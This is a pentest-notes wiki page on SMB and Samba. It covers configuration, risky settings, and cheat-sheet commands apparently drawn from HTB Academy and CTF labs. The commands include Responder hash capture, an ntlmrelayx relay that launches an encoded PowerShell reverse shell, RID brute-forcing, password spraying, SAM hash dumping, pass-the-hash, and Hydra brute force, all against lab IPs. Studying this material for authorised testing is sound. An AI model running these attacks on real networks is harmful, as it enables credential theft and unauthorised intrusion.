CSbyGB - Pentips
Buy me a tea
  • CS By GB - PenTips
    • Welcome to CSbyGB's Pentips
  • Networking, Protocols and Network pentest
    • Basics
    • DNS
    • FTP
    • HTTP & HTTPS
    • IMAP
    • IPMI
    • MSSQL
    • MYSQL
    • NFS
    • Oracle TNS
    • POP3
    • RDP
    • RPC
    • Rservices
    • Rsync
    • SMB
    • SMTP
    • SNMP
    • SSH
    • VOIP and related protocols
    • Winrm
    • WMI
    • Useful tips when you find unknown ports
  • Ethical Hacking - General Methodology
    • Introduction
    • Information Gathering
    • Scanning & Enumeration
    • Exploitation (basics)
    • Password Attacks
    • Post Exploitation
    • Lateral Movement
    • Proof-of-Concept
    • Post-Engagement
    • MITRE ATT&CK
  • External Pentest
    • External Pentest
  • Web Pentesting
    • Introduction to HTTP and web
    • Enumeration
    • OWASP Top 10
    • General Methodo & Misc Tips
    • Web Services and API
    • Vunerabilities and attacks
      • Clickjacking
      • CORS (Misconfigurations)
      • CSRF
      • SSRF
      • Bypass captcha
      • Template Injection (client and server side)
      • MFA bypass
      • XXE
    • Exposed git folder
    • Docker exploitation and Docker vulnerabilities
    • Websockets
  • Mobile App Pentest
    • Android
    • IOS
  • Wireless Pentest
    • Wireless pentest
  • Cloud Pentest
    • Cloud Pentest
    • Google Cloud Platform
    • AWS
  • Thick Client Pentest
    • Thick Client
  • Hardware Pentest
    • ATM
    • IoT
  • Secure Code Review
    • Secure code review
    • Java notes for Secure Code Review
  • AI & AI Pentest
    • MITRE ATLAS
    • OWASP ML and LLM
    • Hugging face
    • AI Python
    • Gemini
    • Ollama
  • Checklist
    • Web Application and API Pentest Checklist
    • Linux Privesc Checklist
    • Mobile App Pentest Checklist
  • Tools
    • Burpsuite
    • Android Studio
    • Frida
    • CrackMapExec
    • Netcat and alternatives
    • Nmap
    • Nuclei
    • Evil Winrm
    • Metasploit
    • Covenant
    • Mimikatz
    • Passwords, Hashes and wordlist tools
    • WFuzz
    • WPScan
    • Powershell Empire
    • Curl
    • Vulnerability Scanning tools
    • Payload Tools
    • Out of band Servers
    • STEWS
    • Webcrawlers
    • Websocat
  • VM and Labs
    • General tips
    • Setup your pentest lab
  • Linux
    • Initial Foothold
    • Useful commands and tools for pentest on Linux
    • Privilege Escalation
      • Kernel Exploits
      • Password and file permission
      • Sudo
      • SUID
      • Capabilities
      • Scheduled tasks
      • NFS Root Squashing
      • Services
      • PATH Abuse
      • Wildcard Abuse
      • Privileged groups
      • Exploit codes Cheat Sheet
  • Windows
    • Offensive windows
    • Enumeration and general Win tips
    • Privilege Escalation
    • Active Directory
    • Attacking Active Directory
      • LLMNR Poisoning
      • SMB Relay Attacks
      • Shell Access
      • IPv6 Attacks
      • Passback Attacks
      • Abusing ZeroLogon
    • Post-Compromise Enumeration
      • Powerview or SharpView (.NET equivalent)
      • AD Manual Enumeration
      • Bloodhound
      • Post Compromise Enumeration - Resources
    • Post Compromise Attacks
      • Pass the Password / Hash
      • Token Impersonation - Potato attacks
      • Kerberos
      • GPP/cPassword Attacks
      • URL File Attack
      • PrintNightmare
      • Printer Bug
      • AutoLogon exploitation
      • Always Installed Elevated exploitation
      • UAC Bypass
      • Abusing ACL
      • Unconstrained Delegation
    • Persistence
    • AV Evasion
    • Weaponization
    • Useful commands in Powershell, CMD and Sysinternals
    • Windows Internals
  • Programming
    • Python programming
    • My scripts
    • Kotlin
  • Binary Exploitation
    • Assembly
    • Buffer Overflow - Stack based - Winx86
    • Buffer Overflow - Stack based - Linux x86
  • OSINT
    • OSINT
    • Create an OSINT lab
    • Sock Puppets
    • Search engines
    • OSINT Images
    • OSINT Email
    • OSINT Password
    • OSINT Usernames
    • OSINT People
    • OSINT Social Media
    • OSINT Websites
    • OSINT Business
    • OSINT Wireless
    • OSINT Tools
    • Write an OSINT report
  • Pentester hardware toolbox
    • Flipper Zero
    • OMG cables
    • Rubber ducky
  • Post Exploitation
    • File transfers between target and attacking machine
    • Maintaining Access
    • Pivoting
    • Cleaning up
  • Reporting
    • How to report your findings
  • Red Team
    • Red Team
    • Defenses Enumeration
    • AV Evasion
  • Writeups
    • Hackthebox Tracks
      • Hackthebox - Introduction to Android Exploitation - Track
    • Hackthebox Writeups
      • Hackthebox - Academy
      • Hackthebox - Access
      • Hackthebox - Active
      • Hackthebox - Ambassador
      • Hackthebox - Arctic
      • Hackthebox - Awkward
      • Hackthebox - Backend
      • Hackthebox - BackendTwo
      • Hackthebox - Bastard
      • Hackthebox - Bastion
      • Hackthebox - Chatterbox
      • Hackthebox - Devel
      • Hackthebox - Driver
      • Hackthebox - Explore
      • Hackthebox - Forest
      • Hackthebox - Good games
      • Hackthebox - Grandpa
      • Hackthebox - Granny
      • Hackthebox - Inject
      • Hackthebox - Jeeves
      • Hackthebox - Jerry
      • Hackthebox - Lame
      • Hackthebox - Late
      • Hackthebox - Love
      • Hackthebox - Mentor
      • Hackthebox - MetaTwo
      • Hackthebox - Monteverde
      • Hackthebox - Nibbles
      • Hackthebox - Optimum
      • Hackthebox - Paper
      • Hackthebox - Photobomb
      • Hackthebox - Poison
      • Hackthebox - Precious
      • Hackthebox - Querier
      • Hackthebox - Resolute
      • Hackthebox - RouterSpace
      • Hackthebox - Sauna
      • Hackthebox - SecNotes
      • Hackthebox - Shoppy
      • Hackthebox - Soccer
      • Hackthebox - Steamcloud
      • Hackthebox - Toolbox
      • Hackthebox - Vault
      • Hackthebox - Updown
    • TryHackme Writeups
      • TryHackMe - Anonymous
      • TryHackMe - Blaster
      • TryHackMe - CMesS
      • TryHackMe - ConvertMyVideo
      • TryHackMe - Corridor
      • TryHackMe - LazyAdmin
      • TryHackMe - Looking Glass
      • TryHackMe - Nahamstore
      • TryHackMe - Overpass3
      • TryHackMe - OWASP Top 10 2021
      • TryHackMe - SimpleCTF
      • TryHackMe - SQL Injection Lab
      • TryHackMe - Sudo Security Bypass
      • TryHackMe - Tomghost
      • TryHackMe - Ultratech
      • TryHackMe - Vulnversity
      • TryHackMe - Wonderland
    • Vulnmachines Writeups
      • Web Labs Basic
      • Web Labs Intermediate
      • Cloud Labs
    • Mobile Hacking Lab
      • Mobile Hacking Lab - Lab - Config Editor
      • Mobile Hacking Lab - Lab - Strings
    • Portswigger Web Security Academy Writeups
      • PS - DomXSS
      • PS - Exploiting vulnerabilities in LLM APIs
    • OWASP projects and challenges writeups
      • OWASP MAS Crackmes
    • Vulnerable APIs
      • Vampi
      • Damn Vulnerable Web Service
      • Damn Vulnerable RESTaurant
    • Various Platforms
      • flAWS 1&2
  • Digital skills
    • How to make a gitbook
    • Marp
    • Linux Tips
    • Docker
    • VSCodium
    • Git Tips
    • Obsidian
  • Durable skills
    • Durable skills wheel/Roue des compétences durables
  • Projects
    • Projects
      • Technical Projects
      • General Projects
  • Talks
    • My Talks about Web Pentest
    • My talks about Android Application hacking
    • Other of my talks and Podcast
  • Resources
    • A list of random resources
Powered by GitBook
On this page
  • Samba
  • Default configuration
  • Dangerous Settings
  • Enumerate and attack SMB
  • Interact with a shared folder on windows
  • Interact with a shared folder on Linux
  • Nmap
  • Responder
  • Hashcat
  • rpcclient
  • Impacket Samrdump
  • Enum with Metasploit
  • smbclient
  • SMBmap
  • Enum4linux
  • Crackmapexec
  • Password attack
  • Hydra
  • Pass attack with Metasploit
  • What to try
  • Resources
  1. Networking, Protocols and Network pentest

SMB

PreviousRsyncNextSMTP

Last updated 6 months ago

Source CTF and HTB Academy

  • Usually on ports 137, 138, 139, 445

is a client-server protocol that regulates access to files and entire directories and other network resources such as printers, routers, or interfaces released for the network. With the free software project Samba, there is also a solution that enables the use of SMB in Linux and Unix distributions and thus cross-platform communication via SMB. Access rights are defined by Access Control Lists (ACL). They can be controlled in a fine-grained manner based on attributes such as execute, read, and full access for individual users or user groups. The ACLs are defined based on the shares and therefore do not correspond to the rights assigned locally on the server.

Samba

Samba implements the network protocol. CIFS is a "dialect" of SMB. CIFS is the extension of the SMB protocol. So when we pass SMB commands over Samba to an older NetBIOS service, it usually connects to the Samba server over TCP ports 137, 138, 139, but CIFS uses TCP port 445 only. With version 3, the Samba server gained the ability to be a full member of an Active Directory domain. With version 4, Samba even provides an Active Directory domain controller. It contains several so-called daemons for this purpose - which are Unix background programs. The SMB server daemon (smbd) belonging to Samba provides the first two functionalities, while the NetBIOS message block daemon (nmbd) implements the last two functionalities. The SMB service controls these two background programs.

Default configuration

  • cat /etc/samba/smb.conf | grep -v "#\|\;" see default configuration

Setting
Description

[sharename]

The name of the network share.

workgroup = WORKGROUP/DOMAIN

Workgroup that will appear when clients query.

path = /path/here/

The directory to which user is to be given access.

server string = STRING

The string that will show up when a connection is initiated.

unix password sync = yes

Synchronize the UNIX password with the SMB password?

usershare allow guests = yes

Allow non-authenticated users to access defined shared?

map to guest = bad user

What to do when a user login request doesn't match a valid UNIX user?

browseable = yes

Should this share be shown in the list of available shares?

guest ok = yes

Allow connecting to the service without using a password?

read only = yes

Allow users to read files only?

create mask = 0700

What permissions need to be set for newly created files?

Dangerous Settings

Setting
Description

browseable = yes

Allow listing available shares in the current share?

read only = no

Forbid the creation and modification of files?

writable = yes

Allow users to create and modify files?

guest ok = yes

Allow connecting to the service without using a password?

enable privileges = yes

Honor privileges assigned to specific SID?

create mask = 0777

What permissions must be assigned to the newly created files?

directory mask = 0777

What permissions must be assigned to the newly created directories?

logon script = script.sh

What script needs to be executed on the user's login?

magic script = script.sh

Which script should be executed when the script gets closed?

magic output = script.out

Where the output of the magic script needs to be stored?

Enumerate and attack SMB

Interact with a shared folder on windows

  • With the GUI

On Windows GUI, we can press [WINKEY] + [R] to open the Run dialog box and type the file share location, e.g.: \\IP\SHARENAME\. We can either be able to access the file share right away or be prompted for a password.

With CMD

:: list the share
dir \\192.168.220.129\Finance\
:: connect to a file share with the following command and map its content to the drive letter n
net use n: \\192.168.220.129\Finance
:: authenticate to the share.
net use n: \\192.168.220.129\Finance /user:plaintext Password123
:: get number of files 
dir n: /a-d /s /b | find /c ":\"

The command net use connects a computer to or disconnects a computer from a shared resource or displays information about computer connections. We can connect to a file share with the following command and map its content to the drive letter n.

The last dir command is explained below:

Syntax
Description

dir

Application

n:

Directory or drive to search

/a-d

/a is the attribute and -d means not directories

/s

Displays files in a specified directory and all subdirectories

/b

Uses bare format (no heading information or summary)

The following command | find /c ":\\" process the output of dir n: /a-d /s /b to count how many files exist in the directory and subdirectories. You can use dir /? to see the full help.

  • With dir we can search for specific names in files such as:

  • cred

  • password

  • users

  • secrets

  • key

  • Common File Extensions for source code such as: .cs, .c, .go, .java, .php, .asp, .aspx, .html.

:: Search for string "cred"
dir n:\*cred* /s /b
:: Searcg for string "secret"
dir n:\*secret* /s /b
:: search with findstr
findstr /s /i cred n:\*.*

Note with findstr it will search within the files with dir it will search in the file names.

  • Examples

dir n:\*cred* /s /b
n:\Contracts\private\credentials.txt
findstr /s /i cred n:\*.*
n:\Contracts\private\secret.txt:file with all credentials

Powershell

// list share
Get-ChildItem \\192.168.220.129\Finance\
// Instead of net use, we can use New-PSDrive in PowerShell.
New-PSDrive -Name "N" -Root "\\192.168.220.129\Finance" -PSProvider "FileSystem"
  • PSCredential Object

$username = 'plaintext'
$password = 'Password123'
$secpassword = ConvertTo-SecureString $password -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential $username, $secpassword
New-PSDrive -Name "N" -Root "\\192.168.220.129\Finance" -PSProvider "FileSystem" -Credential $cred
  • GCI In PowerShell, we can use the command Get-ChildItem or the short variant gci instead of the command dir

PS C:\htb> N:
PS N:\> (Get-ChildItem -File -Recurse | Measure-Object).Count

We can use the property -Include to find specific items from the directory specified by the Path parameter.

:: search for the string "cred" in filenames
Get-ChildItem -Recurse -Path N:\ -Include *cred* -File

The Select-String cmdlet uses regular expression matching to search for text patterns in input strings and files. We can use Select-String similar to grep in UNIX or findstr.exe in Windows.

Get-ChildItem -Recurse -Path N:\ | Select-String "cred" -List
  • Examples

Get-ChildItem -Recurse -Path N:\ -Include *cred* -File

    Directory: N:\Contracts\private

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         2/23/2022   4:36 PM             25 credentials.txt
Get-ChildItem -Recurse -Path N:\ | Select-String "cred" -List
N:\Contracts\private\secret.txt:1:file with all credentials

Interact with a shared folder on Linux

Mount

sudo mkdir /mnt/Finance
sudo mount -t cifs -o username=user,password=Password123,domain=. //192.168.220.129/Finance /mnt/Finance
# With a credential file
mount -t cifs //192.168.220.129/Finance /mnt/Finance -o credentials=/path/credentialfile

The credential file should look like this:

username=user
password=Password123
domain=.

We can then use grep and find to search for specific strings.

find /mnt/Finance/ -name *cred*
/mnt/Finance/Contracts/private/credentials.txt
grep -rn /mnt/Finance/ -ie cred
/mnt/Finance/Contracts/private/credentials.txt:1:admin:SecureCredentials!

Nmap

  • sudo nmap 10.129.14.128 -sV -sC -p139,445

  • You can use dedicated smb scripts

Responder

# Capture credentials
responder -I <interface name>
# Example
sudo responder -I ens33

Relay a captured hash

  1. Set smb to off in /etc/responder/Responder.conf

  2. impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146

  3. Once the victim authenticates to our server, we poison the response and make it execute our command to obtain a reverse shell. nc -lvnp 9001

Hashcat

# Crack smb hashes
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

rpcclient

  • rpcclient -U "" 10.129.14.128 or rpcclient -U'%' 10.10.110.17

Query
Description

srvinfo

Server information.

enumdomains

Enumerate all domains that are deployed in the network.

querydominfo

Provides domain, server, and user information of deployed domains.

netshareenumall

Enumerates all available shares.

netsharegetinfo <share>

Provides information about a specific share.

enumdomusers

Enumerates all domain users.

queryuser <RID>

Provides information about a specific user.

querygroup <RID>

Provides information about a specific group.

  • Sometimes not all commands are available.

  • for i in $(seq 500 1100);do rpcclient -N -U "" 10.129.14.128 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done bruteforce userid

Impacket Samrdump

  • samrdump.py 10.129.14.128

Enum with Metasploit

  • msfconsole

  • use auxiliary/scanner/smb/smb_version

  • options

  • set RHOSTS IP-ADD (in my example instead of IP-ADD I will put 10.0.2.4)

  • We see the version of Samba so it is something that is going to be worth writing down in our notes.

smbclient

  • Tool that will help us to list shares or see useful info

  • smbclient -L \\10.10.55.112 list shares

  • Connect anonymously smbclient --no-pass \\\\10.10.10.100\\SHARE or smbclient //10.10.10.134/SHARE

  • Use -N option in smbclient to suppress the password prompt

  • smbclient -U user \\\\10.129.42.197\\SHARENAME

SMBmap

  • smbmap -H 192.168.1.40

  • smbmap -H 10.129.14.128 -r notes browse the directory "notes"

  • smbmap -H 10.129.14.128 --download "notes\note.txt" Download a file

  • smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt" Upload a file if we have write permission

Enum4linux

Installation

sudo apt install samba-client
sudo apt-get install samba-common-bin
git clone https://github.com/cddmp/enum4linux-ng.git
cd enum4linux-ng
python3 -m venv .
pip3 install -r requirements.txt
source bin/activate

Commands

  • enum4linux -a 10.10.10.100 output all sorts of info

  • enum4linux 10.10.11.45 -A -C

Crackmapexec

  • crackmapexec smb 10.129.14.128 --shares -u '' -p ''

Misc commands

# Password spray
crackmapexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!' --local-auth
# Enum logged on users
crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users
# Extract hashes from sam database
crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam
# Pass the hash
crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE

Password attack

Hydra

  • hydra -L user.list -P password.list smb://10.129.42.197

Pass attack with Metasploit

use auxiliary/scanner/smb/smb_login
options
set user_file user.list
set pass_file password.list
set rhosts 10.129.42.197
run

What to try

  • smbclient --no-pass \\\\10.10.10.100\\SHARE connect to a share anonymously

  • You might find interesting files this way

  • Check out the win version to see if it is vulnerable to anything (eternal blue for example)

  • We can also try this command smbclient //10.10.10.134/SHARE

  • !<cmd> run local system command even if connected to smb (exanple: !ls)

  • get Download a file from smb

  • smbstatus check connections on smb server

Resources

Other example for findstr

To provide a username and password with Powershell, we need to create a . It offers a centralized way to manage usernames, passwords, and credentials.

Create a powershell reverse shell with impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'powershell -e JABjAGwAaQBlA[SNIPPET]'

run

smbclient -L IP-ADD (in my example instead of IP-ADD I will put 10.0.2.4)

Server Message Block (SMB)
SMB examples
Common Internet File System (CIFS)
Documentation
here
PSCredential object
revshells
Github repo
Github repo
SMB Access from Linux
A Little Guide to SMB Enumeration - Hacking ArticlesHacking Articles
A little guide to SMB Enumeration
139,445 - Pentesting SMBHackTricks
Pentesting SMB - Hacktricks
rpcclient
SMB client man page
Logo
Logo
Logo